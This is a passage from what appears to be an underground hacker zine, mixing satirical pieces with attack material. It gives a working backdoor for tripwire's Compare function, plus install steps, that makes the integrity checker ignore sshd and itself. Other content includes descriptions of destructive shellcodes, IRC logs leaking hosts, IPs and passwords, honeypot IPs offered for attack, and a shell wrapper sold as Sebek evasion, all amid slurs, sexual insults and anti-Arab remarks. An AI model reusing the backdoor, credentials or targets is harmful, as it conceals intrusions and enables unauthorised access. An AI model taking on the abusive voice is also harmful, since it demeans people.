do you mean it's not Ok just to match the size/timestamp?", and I urge these
people to just put the keyboard down and walk away.)

Well, I have spent many hours searching the source code of tripwire looking
for tricks to get around this big problem. Tripwire, Inc, have taken a lot
of time to make their source code hard to audit, and the infamous Object
Orientated Bloatware approach has been used to make any audit as unpleasant
as possible. However, after several hours work I came up with the following
solution:

Just replace the Compare method in src/fco/fcocompare.cpp with the one
below! It's a pretty small file, and anyway patch is hard. You know you're
probably better off sticking to cut 'n' paste in notepad! Just add new
elements to the hidden array for every file you don't want tripwire to
check! Just do a 'make release' and copy the tripwire binary over the top
of the old one - remember to strip the binary and to match size and
timestamp!

---[CUT HERE YOU MORON]--------------------------------%<--------------------------------------------------

///////////////////////////////////////////////////////////////////////////////
// Compare
///////////////////////////////////////////////////////////////////////////////
uint32 cFCOCompare::Compare(const iFCO* pFco1, const iFCO* pFco2)
{
    int i = 0;
    char *hidden[] = { "/usr/sbin/sshd", "/usr/sbin/tripwire", 0 };

    ASSERT(pFco1 != 0);
    ASSERT(pFco2 != 0);

    // first, make sure the fcos are of the same type...
    if(pFco1->GetType() != pFco2->GetType())
    {
        ASSERT( false );
        INTERNAL_ERROR( "fcocompare.cpp" );
    }

    /* hohoho letz be kradicle */
    // every name in hidden[] is reported EQUAL without ever being compared
    while(hidden[i])
    {
        if(strcmp(pFco1->GetName().AsString().c_str(), hidden[i]) == 0)
        {
            return EQUAL;
        }
        i++;
    }

    const iFCOPropSet* ps1 = pFco1->GetPropSet();
    const iFCOPropSet* ps2 = pFco2->GetPropSet();
    const cFCOPropVector& v1 = pFco1->GetPropSet()->GetValidVector();
    const cFCOPropVector& v2 = pFco2->GetPropSet()->GetValidVector();
    uint32 result = 0;

    mInvalidProps.SetSize( v1.GetSize() );
    mUnequalProps.SetSize( v1.GetSize() );
    mInvalidProps.Clear();
    mUnequalProps.Clear();

    // finally, compare all the properties
    for(int i = 0; i < v1.GetSize(); i++)
    {
        if(v1.ContainsItem(i))
        {
            if(! v2.ContainsItem(i))
            {
                // the second fco doesn't have this property
                mInvalidProps.AddItem(i);
                result |= PROPS_NOT_ALL_VALID;
            }
            else
            {
                if(ps1->GetPropAt(i)->Compare(ps2->GetPropAt(i), iFCOProp::OP_EQ) != iFCOProp::CMP_TRUE)
                {
                    // they are not equal!
                    mUnequalProps.AddItem(i);
                    result |= PROPS_UNEQUAL;
                }
            }
        }
    }

    if( ! result )
        result = EQUAL;

    return result;
}

---[STOP CUTTING HERE YOU MORON]----------------------------%<----------------------------------------------


|=[ 0x07 ]=--------------------------------------------------------------=|

Evil Shellcodes
by The Blackhat Moriaty

Here is a nice little archive of ready-to-use Linux shellkodez 4 your
perusal. All have been filtered for bad chars and tested in the wild!

/*
 * Opens /dev/audio, reads bytes from /dev/random and
 * while they are non-null, writes them to /dev/audio.
 *
 * Note: We tested this one on Al Huger. We embedded this inside a gay
 * porn mpg, which exploited a local vulnerability in xine. Al thought he
 * was gonna watch Frisky Summer II, but imagine his surprise when this
 * garbage was heard thru his speakerz instead!
 */

/*
 * Chmods /sbin/init non-executable and then writes
 * "logout" to the end of the root user's login
 * file.
 *
 * Note: This idea was borrowed from the infamous seiki ownage log. So,
 * I guess not terribly original but still a classic in its own right.
 */

/*
 * As used in the infamous cryptome.org defacement,
 * writes "It was bighawk!" to the index.html
 */

/*
 * Copies /etc/shadow over the top of /etc/issue
 *
 * Note: Pure fun... this never gets old
 */

/*
 * Removes jobe's entries from /etc/[passwd/shadow]
 * then rm's /home/jobe
 */

/*
 * Reads a single byte from /dev/random, if it's
 * 0x0 then rm's /
 *
 * Note: The shellcode version of phrack.efnet.ru's own
 * hacker russian roulette.
 */


|=[ 0x08 ]=--------------------------------------------------------------=|

Really Dangerous Cisco Shit Released
by FX

if the w0rld g4sped w/ anticipation when the legendary dvdman made a subtle
r3f3r3nc3 2 hiz c1sq0 rem0te shell penetration t00l on irc, and the logz
were published 4 all, that wuz nothing compared to the widespr34d p4n1c th@
f0llowed phen0elitz new shit. apparently, there iz a 2 GB s1gned 1nteger
0verflow in cisc0 routerz!!!!!! let'z view the approximate timeline 4
phen0elitz development of this expl0it:

Jan 5.
  3PM    finish reading thru ios 11.3 src code 4 the day
  4PM    contact the 15 person phen0elit art team
  4.5PM  fritzie calls back with a great idea for an 'exploit name'
  4.6PM  holgar iz w0rking on the ascii banner, wilhelm is making the t-shirt
Jan 6.
  10AM   prepare to see if the vulnerability is exploitable, write POC
  11AM   start sending 2gb of data to the r0uter on the lokal NET
  8PM    end of specially crafted data arrives @ r0uter
Jan 7-
  11AM   start sending daily 2 gb
Feb 25
  8PM    0h b0y 0 b0y! my r0uter finally cr4shed 2day! l3mm3 r3ad l0gz
Feb 26
  8PM    1t w0rked! n0w 1 n33d 2 sk4n th3 n3t & f1nd an0ther r0uter s0mewhere runn1ng the exact same i0s vers10n 0n the s4me ch1ps3t, w1th the same number of open s0cketz, & with the exact same dev1c3z
Mar 8
  2PM    g0t it!
Mar 8
  3PM    try rem0te exploit!
Jul 20
  5AM    w0w! my wh0le packet finally arrived, 1t w0rkd! n0w letz have fun w/ th1z k0rean r0uter until the adm1n getz b4ck fr0m falun g0ng & findz h1z c0nf1g is m1ss1ng
Jul 20
  7AM    sent advis0ry out 2 dave ahmad

|=[ 0x09 ]=--------------------------------------------------------------=|

The Defcon Review
by phr4k st4ff

s0, this yearz defcon really suqd, even m0re than all the onez in recent mem0ry. well, it could have been worse, phrack staff could have been stranded at s0me place like CCC, with a bunch of y0deling european haqr fagg0tz with roq-climbing bakpakz & bootz & green sh0rtz & suspenderz listen1ng 2 dav1d hasselh0ff tapez while stealth talkz about the new pr0cfs function he f0und and hendy playz w1th h1z sh0elaces....

so what did u miss if u werent @ defc0n? h0pefully a lizt will b eazier than thiz dial0gue f0rm@:

  o crispin c0wan
    o haz a phd
    o teachez a few intro 2 os coursez @ oregon inst. of tech or smtg.
    o also writes "secure" software
    o agreed that he "fucked up" when his immunix stackguard th1nk t4nk decided 2 plaze the c4n4ry 0n the st4q betw33n the fr4me p0inter & the st4ck p0inter
    o wuz @ defk0n hakn it up with hiz companyz ctf team
    o stayed in vegas for a week, but didnt stop playing ctf
    o somehow, 20 d00dz from immunix got paid 2 go 2 vegas 2 play ctf??
    o immunix l0st ctf

  o kev1n m1tnick
    o the c0nd0r wuz wandering ar0und defk0n like an autistic kid inside the myst3ry fun h0uze
    o tr1ed talking 2 him but apparently he wuznt 2 happy cuz we w3r3 th3 0nly ppl th3r3 th@ werent try1ng 2 kizz h1z azz
    o rej3kted 0ur 0fferz 2 g1ve h1m the upd8d k0py 0f jsz's m41lsp00lz

  o w1nn schw4rt4u
    o st1ll f@ & bl04t3d

  o s0me n4sty 4ss ch1x d01ng h4qr je0pardy
    o 4sk3d s0me krazy tekn1k4l quest10nz l1ke "what does the n0p instrukt10n d0 in ass3mbly?" & thus b4ffl3d the kr0wd

  o l4nce sp1tzc0q
    o n0t really sure 4b0ut th1z 0n3
    o l3ft 4ft3r day1 becuz 0f 4ll the h4rr4ssm3nt... h4h4h4h!

  o n30nfr30n
    o we h4d n0 idea wh0 th1z guy wuz unt1l s0meb0dy sh0uted: "hey rnt u ne0nfre0n fr0m und3rn3t?!?!?!?!"

  o p4ck3t f41ry
    o the highl1te 0f every defk0n, wuz h3r3 th1z year 2!
    o th1z y34r wearing leather ch4pz 0ver kut0ff st0new4sh3d j34nz

  o h4ck3r d14r13z
    o sp0ttd 2 memberz 0f th1s l3g3nd4ry s4g4
    o hd m00re, beam1ng 4ft3r h1s r1pp3d xf0cus dc0m rel34s3
    o s4w 4nn4 m00r3 (4k4 st4rl4 pur3h34rt), th0ught sh3 w4z a d00d @1st

  o h4x0r g1rlz
    o p0rn0graph1c f1lmz w1th g1rlz simultane0uzly str1ppn/us1ng nmap
    o def1n1tely the 0nly t1me ull hear 'fy0d0r' and 'pussy' in the same p4r4gr4ph
    o th3z3 g1rlz were 2 nause4t1ngly disgust1ng 2 fuq, & bes1d3z we r4n 0ut 0f 0ur preskr1pt0n 4 v4ltr3x, s0 the 0nly pers0n br4v3 en0ugh 2 get a p4rty f4v0r 0ut 0f the d34l wuz tr4shk4n m4n

DISCLAIMER: 1m n0t sure h0w funny th1z wuz, pr0bably n0t @ all becuz th3r3 really wuz n0th1ng 2 rep0rt. DC 12 sh0uld be a l0t m0re fun, j01n us th3r3 w3r3 g0nna k0mm1t mass su1c1de!
|=[ 0x0a ]=--------------------------------------------------------------=|

A Pr0ix IRC Medley
by the b1g leb0wsk1

EDITORS NOTE: We continued this exhilarating piece here, at the end of Linenoise just because of its sheer immense volume. This piece was also submitted much later by the author, who had to actually create a specialized log cutting program that made use of the Boyer-Moore fast string searching algorithm, to find the most interesting snippets from gigabytes of pr0ix irc logs.

Ever wanted access to hack.co.za ?

[26 Aug/05:42am] (pr0ix) i have a static ip where im coming from
[26 Aug/05:43am] ok
[26 Aug/05:43am] (pr0ix) 195.254.225.135 source
[26 Aug/05:43am] host: hack.co.za
[26 Aug/05:43am] user: m0rkus
[26 Aug/05:43am] pass: d0rkus
[26 Aug/05:44am] (pr0ix) k

/*************************************************/

Or @ on #darknet ?

[10 Aug/12:28pm] -Mengele- Congradulations pr0ix!
[10 Aug/12:28pm] -Mengele- dvdman has given you Ops with flags o on #darknet.
[10 Aug/12:28pm] -Mengele- Please set a password: /msg Mengele pass
[10 Aug/12:28pm] -Mengele- where is your selected password.
[10 Aug/12:28pm] -Mengele- You can get ops by: /msg Mengele op
[11 Aug/01:24am] (pr0ix) pass fuckm3h4rd!
[11 Aug/01:24am] -Mengele- Password set to: 'fuckm3h4rd!'.
[20 Aug/01:58am] -Mengele- Your flags have been upgraded to o on #darknet.

/*************************************************/

Me me me me me !!!!

[6 Aug/01:59am] @ Topic by pr0ix: if anyone is interested to make a botnet /msg pr0ix

/*************************************************/

And so do we!!!

[2 Sep/02:45am] (pr0ix) i have enough log's from different places to get you busted
[2 Sep/02:46am] umm....

/*************************************************/

Anyone want CANVAS?, thanx dvdman !!

[11 Aug/02:40am] http://codes.dvdman.ws/warez/CANVAS
[11 Aug/02:41am] (pr0ix) whats that?
[11 Aug/02:42am] david aidels canvas
[11 Aug/02:42am] its a exploit thingy

/*************************************************/

Its one of lifes mysteries !

[22 Aug/02:23am] (pr0ix) btw how the fuck can i sniff ftp passwords with tcpdump?
[22 Aug/02:46am] (pr0ix) explain me howto sniff with tcpdump
[22 Aug/02:47am] tcpdump -lnettts 1600 -Xw tcpdump.out & tail -f tcpdump.out
[22 Aug/02:47am] hmm
[22 Aug/02:47am] that should work

/*************************************************/

Chiqz fuck for shellcode ?!?!

[5 Sep/08:19am] damn they didn't post zacode.c .. prolly banner was too lame even though the 21b shellcode worked.... eheheh ill prolly not b able to eat her pussyt now
[5 Sep/08:19am] (pr0ix) why do you care?
[5 Sep/08:20am] (pr0ix) who is that chick?
[5 Sep/08:20am] cuz she was willing to fuck me =P
[5 Sep/08:20am] eheheh she's not even that hot actually

/*************************************************/

Someone send pr0ix a copy of "Shell scripting for dummies"

[4 Aug/03:03am] (pr0ix) hmm listen, i have a small problem where you can help me
[4 Aug/03:03am] sup?
[4 Aug/03:03am] (pr0ix) i have some files in a directory like 20030701_syslog.log 20030702_syslog.log etc etc
[4 Aug/03:03am] yeah
[4 Aug/03:03am] (pr0ix) i want to cat every single file and grep -i for DISCONNECT and write it do date.log
[4 Aug/03:04am] (pr0ix) i mean: cat 20030701_syslog.log|grep -r DISCONNECT >20030701.logs
[4 Aug/03:04am] (pr0ix) how to automate this?
[4 Aug/03:04am] (pr0ix) cat 20030702_syslog.log|grep -r DISCONNECT >20030702.logs
[4 Aug/03:04am] (pr0ix) etc etc

/*************************************************/

Yes, that truly would be the best. It sounds very feasible too!

[8 Sep/03:12am] what kind of trojan do you need?
[8 Sep/03:12am] (pr0ix) ssh
[8 Sep/03:12am] (pr0ix) best would be all in one SSH/INETD/APACHE+sniffer
[8 Sep/03:13am] (pr0ix) even a rootkit would do the job, it has to be private, everything else gets detected

/*************************************************/

You've only just realised ??

[4 Aug/02:53pm] (pr0ix) wait wait :P
[4 Aug/02:54pm] (pr0ix) i have 0 clue..

/*************************************************/

Don't we?

[7 Aug/09:07am] (pr0ix) 1] you don't even know from what fucking place on the earth i come from
[7 Aug/09:07am] (pr0ix) 2] you have zero clue what networks i admin
[7 Aug/09:07am] (pr0ix) 3] you dont know what and where i work

/*************************************************/

Opers abusing their status? tututut

[8 Sep/07:32am] (pr0ix) do me a favour /stat jaf
[8 Sep/07:33am] /stat l?
[8 Sep/07:33am] (pr0ix) yeah
[8 Sep/07:33am] (pr0ix) no even
[8 Sep/07:33am] (pr0ix) just /stat jaf
[8 Sep/07:34am] /stat is an ambiguous command, /stats jaf shows nothing
[8 Sep/07:34am] /stats l gives ... irc.choopa.net jaf[~jaf@phrack.com.br] 0 2740 160 1707 54 :31847 3 -
[8 Sep/07:34am] (pr0ix) hmm
[8 Sep/07:34am] (pr0ix) you are global O ?
[8 Sep/07:34am] yup
[8 Sep/07:38am] (pr0ix) ok we found it
[8 Sep/07:38am] (pr0ix) [blane(blane@oper.efnet.demon.co.uk)] unknown@193.99.135.162 is not valid for the account specified
[8 Sep/07:38am] (pr0ix) thx anyways
[8 Sep/07:38am] (pr0ix) found the real ip
[8 Sep/07:39am] (pr0ix) fuck that is blane's work ip
[8 Sep/07:42am] the ip isn't 140.164.30.200?
[8 Sep/07:43am] (pr0ix) no
[8 Sep/07:43am] (pr0ix) do: /dns 140.164.30.200
[8 Sep/07:43am] try asking someone on choopa?
[8 Sep/07:43am] (pr0ix) everyone idle
[8 Sep/07:44am] ... irc.choopa.net jaf[~jaf@198.169.185.135] 0 2848 167 1754 55 :32461 8 -
[8 Sep/07:44am] /stats L jaf
[8 Sep/07:44am] (pr0ix) great thank you
[8 Sep/07:44am] (pr0ix) great great
[8 Sep/10:13am] (pr0ix) hmm can you /stat jaf again?
[8 Sep/10:15am] ...
irc.secsup.org jaf[~jaf@198.169.185.135] 0 382 26 162 4 :2534 0 -

/*************************************************/

Thanks !

[20 Aug/10:57am] (pr0ix) ssh reptile.cube11.net -p 2222 -l lsd
[20 Aug/10:57am] (pr0ix) pass ist try2fix!
[20 Aug/11:48am] (pr0ix) reptile.cube11.net 2222 panther/!changeme

/*************************************************/

pr0ix aka z3r0c00l !!

[5 Sep/03:16am] dood.. you have no idea what you are talking about.. your technical knowledge is VERY limited..
[26 Aug/10:10am] (pr0ix) ja fuck with the bes, die like the rest

/*************************************************/

pr0ix repeating...

[4 Sep/08:07am] well, nothing really.. playing with linux kernel 2.6
[4 Sep/08:07am] hooking systemcalls through dma
[4 Sep/08:07am] quite nice
[4 Sep/08:07am] (pr0ix) interesting.. got some new warez?
[4 Sep/08:07am] (pr0ix) greets
[4 Sep/08:08am] (pr0ix) listen is it possible to hook systemcalls trough dma?
[4 Sep/08:11am] i have absolutely no idea whatsoever :)

/* Lol, it doesn't stop there ! Does anyone actually think pr0ix even knows what an off by one is? */

[4 Sep/08:09am] (pr0ix) rumours about a OpenBSD ftpd off by one are going around
[4 Sep/08:10am] heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no nothing.
[5 Sep/02:57am] (pr0ix) hmm
[5 Sep/02:58am] (pr0ix) heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no nothing
[5 Sep/02:58am] (pr0ix) maybe you found something else
[5 Sep/02:58am] realpath
[5 Sep/02:58am] (pr0ix) sftp or ftpd?

/*************************************************/

pr0ix gets tough!..

[11 Aug/01:43am] (pr0ix) i dont even know "mrdivide" i dont like kidz at all
[11 Aug/01:44am] mrdivide owns the botnet that is currently controling #darknet
[11 Aug/01:44am] im not a kid
[11 Aug/01:44am] (pr0ix) watch your mouth if you want to stay and dont fuck with people you don't know.
[8 Sep/07:48am] (pr0ix) listen, just a advice from me, stop playing with CNR's reverse Zone's
[8 Sep/07:48am] (pr0ix) just a advice
[8 Sep/07:48am] what is CNR's ?
[8 Sep/07:48am] (pr0ix) you know what i mean
[8 Sep/08:01am] (pr0ix) you little fag, what makes you think i own that box?
[8 Sep/08:01am] (pr0ix) and i think the biggest kid are you
[8 Sep/08:02am] nah
[8 Sep/08:02am] im l33t, you not
[26 Aug/03:12am] its childish
[26 Aug/03:12am] (pr0ix) you can feel lucky, belive me he's able to take out your whole ISP's backbone..
[26 Aug/03:12am] (pr0ix) yeah why not, i could kill your isp
[26 Aug/03:07am] (pr0ix) you are a clueless fag
[26 Aug/03:07am] (pr0ix) you keep fucking with my friends
[26 Aug/03:07am] how so ?
[26 Aug/03:07am] (pr0ix) i dont want you in #darknet so fuck off

/*************************************************/

pr0ix starts his own pr0j3ct m4yh3m

[31 Aug/11:46am] (pr0ix) yeah, heh i started a new project, "no justice - no peace - kill arabs"
[31 Aug/11:50am] (pr0ix) soon i will be able to toggle the internet in every arab country, sounds strange and gay but its true
[31 Aug/11:53am] I hope so :)
[31 Aug/11:57am] (pr0ix) no shit, it will even affect the big oil companies

/*************************************************/

ROFL

[7 Aug/09:02am] who knows maybe u did get haxed
[7 Aug/09:03am] (pr0ix) haha never

/*************************************************/

At least pr0ix laughs at his own lameness

[8 Sep/08:22am] <[RaFa]> many people told me your skilled
[8 Sep/08:22am] (pr0ix) *lol*

/*************************************************/

I wonder what goodies are on dvdmans home box?

[22 Aug/02:25am] ssh 208.59.134.110
[22 Aug/02:25am] login = pr0ix
[22 Aug/02:25am] pw = temp

/*************************************************/

|=[ 0x0b ]=--------------------------------------------------------------=|

Project Honeynet Enumeration
by anonymous Phrack High Council Member

Well we all know about the HoneyNet project.
(www.honeynet.org for l4merz) They catch hackers by luring you in with the appearance of exploitability, record all your traffic with Snort and Sebek (their vlogger ripoff), then steal all your 0day, and abuse it for creepy whitehat purposes. Like, say, publishing the code on bugtraq. Or having Lance pretend to understand it. Or put it in the hands of any other narc/spook in the business of selling out their souls.

Do not despair kiddies! The tables are turning. PHC Enterprises, LTD, a subsidiary of Phrack Magazine Corp., has developed a highly efficient, multithreaded, self-replicating, highly aggressive packet scanner capable of identifying honeypots in the wild.

Enter HONEYSCAN.C!!@@#$%^

HONEYSCAN: "Stickier than rloxely's keyboarD!"
HONEYSCAN: "More tricks than a vegas hooker!"
HONEYSCAN: "Smokes the crack!"

The advanced crack-smoking techniques used in this scanner will not be disclosed at the present time, at the request of PHC Labs/Research division. Testing is ongoing. However, if honeypots or honeynets are ever deployed... AHEM, uhh anywhere at all really, you can rest assured that PHC Enterprises will alert YOU, the PHRACK consumer, of the presence of honeypots on the Internet.

As a token of our gratitude for your continued patronage of the true underground scene, we would like to present a list of honeypots, for recreational packeting purposes.

DRUMROLL, PLEASE: RECREATIONALLY PACKET THESE BOXES!@#$% RLOXLEY THIS MEANS YOU.

141.211.133.240
141.211.133.241
141.211.133.242
141.211.133.243

|=[ 0x0c ]=--------------------------------------------------------------=|

Sebek Sucks
by Chris Spencer

/*
 * Copyright (C) 2002, 2003 ISS Inc.
 * All Rights Reserved.
 *
 * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * This code can be very dangerous if put in the wrong hands.
 * Do not distribute.
 *
 * This piece of warez lets you go unlogged on sebek-enabled honeypots.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main (int argc, char **argv)
{
    int l;
    char *p, buf[1024];

    /* read one command line at a time from stdin */
    while (fgets (buf, sizeof (buf) - 1, stdin)) {
        /* strip the trailing newline / carriage return */
        l = strcspn (buf, "\r\n");
        buf[l] = '\0';

        if (!strcmp (buf, "exit") || !strcmp (buf, "logout")) {
            exit (0);
        } else if (!strncmp (buf, "cd", 2)) {
            /* "cd" is a shell builtin, so handle it in-process */
            p = strrchr (buf, ' ');
            if (!p)
                continue;
            chdir (p + 1);
        } else {
            /* everything else goes to /bin/sh via system() */
            system (buf);
        }
    }
    return 0;
}

|=[ 0x0d ]=--------------------------------------------------------------=|

Bluebox Infoz
by tr4shc4n m4n

Yo yo-

|=----------------------------------------------------------------------=|

How many times have you been hanging around on IRC when some moron goes off about BlueBoxing, and the threat it poses. (See #2600/#hackphreak/#cdc/#pla <- theze guys are the worst.) Well for this issue we decided to dump something found in the trash a few years ago by one of our S3kr3t 4g3ntz. Thanks to this document the textfile knowledge of a generation of overweight wannabe vampire hackers (yo werd 2 the DoC) will be eradicated. Yo propz to liveevil - where you @ bro!@#!@#!@#!@#!@#.

PS. SOMEONE PLZ GIVE US A FUCKING SCANNER THIS SHIT IS HARD AS FUCK TO RETYPE!!

Contents

  Introduction
  Description
    Testing for fraudulent calls
    Recording fraudulent calls
    Disposing of fraudulent calls
      Cut the call
      Continue the call
  Operational measurements
  User interface
    Commands
    Alarms
    Logs
  List of terms

List of figures

  Figure 2-1  Fraudulent call setup
  Figure 2-2  Fraudulent call system response
  Figure 2-3  Reserved multifrequency receiver

List of tables

  Table 2-1  MFR attachment response
  Table 3-1  Blue box fields
  Table 4-1  Log description

Blue Box Fraud Detection Feature Description, BCS22 and up

Introduction

This document describes the Blue Box Fraud Detection feature and its operation within the DMS-100 Family. A "blue box"
is any device, connected illegally to a subscriber's line, that can produce both a 2600 Hz tone and multifrequency (MF) digits. To place a fraudulent call, the perpetrator performs two steps:

  1  The perpetrator uses a normal telephone to place a normal call. This call is usually a free or inexpensive call, and uses a Single Frequency (SF) trunk beyond the perpetrator's billing office.

  2  The perpetrator uses a blue box to place the fraudulent call. This call uses the SF trunk seized for the original, normal call.

The perpetrator's billing office typically does not detect calls placed with a "blue box", thus the term "blue box fraud".

The Blue Box Fraud Detection feature discovers fraudulent MF signaling over Centralized Automatic Message Accounting (CAMA) and SuperCAMA trunks. It does not detect fraudulent signaling over Traffic Operator Position System (TOPS) trunks. The Blue Box Fraud Detection feature can alert the operating company of a fraudulent call attempt and either allow billing to be made for the call or disconnect the call. This feature detects fraudulent MF signaling but does not detect fraudulent SF pulsing.

No customer data schema is required, because the feature is activated and deactivated using the Command Interpreter (CI) facilities at the Maintenance and Administration Position (MAP). The feature implements the method of detection of fraudulent telephone calls described in U.S. patent 4,001,513.

Description

The Blue Box Fraud Detection feature allows the DMS-200 to perform three fraud detection functions:

  · test for fraudulent calls
  · record fraudulent calls
  · dispose of fraudulent calls (cut or continue).

Those events are described in the remainder of this chapter. Figure 2-1 describes how a perpetrator initiates a fraudulent call.

Figure 2-1  Fraudulent call setup

To place a fraudulent call, the perpetrator first places a normal call. The End Office sends the digits to the CAMA office.
The CAMA office receives and translates the digits from the End Office, and seizes an outgoing trunk. The Office at the far end of the outgoing trunk winks in response, and the CAMA office sends the called digits for this normal call. No fraud has taken place yet.

[Figure 2-1 diagram, elements only: END OFFICE, CAMA TRUNK, CAMA OFFICE (DMS 200), OUTGOING TRUNK, WINK]

297-1001-132 Standard 02.02 March 1991

Figure 2-2 describes how the system responds to a fraudulent call, and how the testing procedure is invoked.

Figure 2-2  Fraudulent call system response

[Figure 2-2 diagram, elements only: END OFFICE, CAMA TRUNK, CAMA OFFICE (DMS 200), OUTGOING TRUNK, WINK, BLUE BOX]

Testing for fraudulent calls

Triggered by the unexpected wink, the DMS-200 begins to test the suspected fraudulent call. Figure 2-3 describes how the DMS-200 prepares to test for fraudulent calls.

Figure 2-3  Reserved multifrequency receiver

[Figure 2-3 diagram, elements only: END OFFICE, CAMA TRUNK, CAMA OFFICE (DMS 200), OUTGOING TRUNK, WINK, BLUE BOX, reserved MFR, broadcast connection]

To test the call, the DMS-200 establishes a broadcast network connection from the suspected incoming CAMA trunk to a reserved MF receiver (MFR). These MFR are reserved when the feature is activated. As long as the feature is active, the reserved MFR are not available for standard call processing.

NOTE: The number of MFR set in reserve depends on the number of simultaneous fraud attempts expected. For providing MFR refer to Provisioning, 297-1001-450.

Following is a description of the events that occur after the MFR is attached.
Table 2-1 describes the events that occur after the MFR is attached. After attaching the MFR, the DMS-200 waits for one of the events shown in the "Event" column of Table 2-1 and responds to that event as shown in the "System response" column of the same table. Table 2-1 also includes an "Explanation" column to clarify circumstances and conditions surrounding the event being described.

Table 2-1  MFR attachment response

  Event:            Wink
  Explanation:      Wink on the same trunk again.
  System response:  Reset the MFR timeout and continue to wait.

  Event:            Digits
  Explanation:      A fraudulent set of called digits has been received.
  System response:  Provide the charge utility with these digits and use the Automatic Message Accounting (AMA) Event Information Digit to flag this call as a Blue Box call. Release the MFR. If the CUT option was specified from the MAP, disconnect the call. Refer to Commands (in User interface) for information about the CUT option.

  Event:            Call Failure
  Explanation:      Mutilated digit(s) detected by the MFR. Several things could cause this:
                      · the call may have released
                      · there may be a real transmission problem
                      · the perpetrator may be using SF pulsing
  System response:  Release the MFR and assume no fraud has taken place.

  Event:            MFR Timeout
  Explanation:      The time allowed to detect possible fraudulent MF digits has expired.
  System response:  Release the MFR and assume no fraud has taken place.

Recording fraudulent calls

The DMS-200 performs the following actions after detecting a fraudulent call:

  · If the CUT option was not specified, replace the original digits in the charge buffer with the fraudulent digits. Note: If the perpetrator places more than one fraudulent call, only the last call appears in the charge buffer.
  · Set the AMA event information digit to mark the call as a blue box call. See document Automatic Message Accounting - Northern Telecom Format, 297-1001-119.
  · If the office is performing AMA recording for this call, generate a log to alert the operating company office that a Blue Box call is in progress.
  · If the ALARM option was specified at the MAP, generate a visual/audible minor alarm.

Disposing of fraudulent calls

There are two options for disposing of fraudulent calls: cut the call or continue the call.

Cut the call

To cut a fraudulent call, the DMS-200 performs the following actions:

  · releases the MFR
  · releases the connection between the originating and terminating agents of the call
  · processes the AMA information
  · deallocates the terminator
  · sets treatment for the originator.

Continue the call

If the CUT option was not specified, the DMS-200 releases the MFR and the call continues. The perpetrator is billed based on the fraudulent digits. When the subscriber disconnects the call, the system generates a log and turns off the alarm if the ALARM option was specified.

Operational measurements

The Operational Measurement BLUEBOX is associated with the Blue Box Fraud Detection feature (see Operational Measurements (OM), 297-1001-814, for more information). The CI command OMSHOW BLUEBOX will display the contents of each field. BLUEBOX has the following fields:

Table 3-1  Blue box fields

  Field     Description
  BBWinks   Number of unexpected winks detected on incoming CAMA trunks. These winks could indicate fraudulent calls.
  BBAttach  Number of successful MFR attachments to suspected trunks.
  BBDetect  Number of fraudulent calls detected.

User interface

The Blue Box Fraud Detection feature is activated by a CI command issued at the MAP. The same command can be used to query the status of the feature. The following section describes the syntax and options of the commands.
Commands

BLUEBOX  ACT CLR  nmfr  timeout  ALARM CUT

activates, clears, or queries the status of the Blue Box Fraud Detection feature. Activating the feature reserves the specified number of MFR. Clearing the feature returns the MFR to the common pool.

Where:

  ACT      activates the blue box feature and reserves the specified number of MFR.
  CLR      deactivates the blue box feature and returns the MFR to the common pool.
  nmfr     specifies the number of MFR to be reserved.
             · Range: 1 through 3.
             · Default: 1.
  timeout  specifies the number of seconds the MFR will wait for digits.
             · Range: 5 through 35.
             · Default: 30.
  ALARM    specifies that an audible/visual alarm will be generated when a Blue Box call is detected.
  CUT      specifies that fraudulent calls will be disconnected. If this parameter is not specified, the fraudulent call will continue.

Note 1: The activation parameters are position-dependent. That is, nmfr must be specified before timeout; both nmfr and timeout must be specified before ALARM or CUT.

Note 2: The BLUEBOX command issued without any parameters queries the system for the feature status.

Examples:

  1  Activate the blue box feature using only the default parameters. The user enters the following CI command:

       BLUEBOX ACT

     The system responds with the feature status and parameters:

       Bluebox Fraud Detection Feature Status: Active.
       1 MFR reserved, timeout set to 30 seconds.

  2  Activate the blue box feature and reserve two MFR. The user inputs the following CI command:

       BLUEBOX ACT 2

     The system responds with the feature status and parameters:

       Bluebox Fraud Detection Feature Status: Active.
       2 MFR reserved, timeout set to 30 seconds.

  3  Activate the blue box feature and reserve three MFR with a timeout of 22 seconds. The user inputs the following CI command:

       BLUEBOX ACT 3 22

     The system responds with the feature status and parameters:

       Bluebox Fraud Detection Feature Status: Active.
       3 MFR reserved, timeout set to 22 seconds.
  4  Activate the blue box feature with the ALARM option. Reserve one MFR with a timeout of 30 seconds. The user inputs the following CI command:

       BLUEBOX ACT 1 30 ALARM

     The system responds with the feature status and parameters:

       Blue Box Feature Status: Active.
       1 MFR reserved, timeout set to 30 seconds.
       Detection will report alarm.

  5  Activate the blue box feature with the CUT option. Reserve two MFR with a timeout of 25 seconds. The user inputs the following CI command:

       BLUEBOX ACT 2 25 CUT

     The system responds with the feature status and parameters:

       Bluebox Fraud Detection Feature Status: Active.
       2 MFR reserved, timeout set to 25 seconds.
       Detection will cut off call.

  6  Determine the status of the blue box feature. The user inputs the following CI command:

       BLUEBOX

     If the feature is not active, the system responds with:

       Bluebox Fraud Detection Feature Status: Inactive.

     If the feature is active, the system responds with the feature status and parameters:

       Bluebox Fraud Detection Feature Status: Active.
       2 MFR Reserved, timeout set to 35 seconds.
       Detection will cut off call.

  7  Deactivate the blue box feature and return the MFR to the common pool. The user inputs the following CI command:

       BLUEBOX CLR

     The system indicates command execution with the response:

       Bluebox Detection Feature Cleared.

Q BLUEBOX

queries the system for the syntax of the BLUEBOX command.

Example: Display the BLUEBOX command syntax. The user inputs the following CI command:

       Q BLUEBOX

The system responds with the following syntax diagram:

       Parameters for Bluebox Fraud Detection
       Parms: [ {CLR, ACT [ {1 TO 3}] [ {5 TO 35}] [ {ALARM, CUT}]}]

Alarms

If the ALARM option is specified, a minor office alarm is activated whenever a blue box call is detected. The office alarm is deactivated at call disconnect.
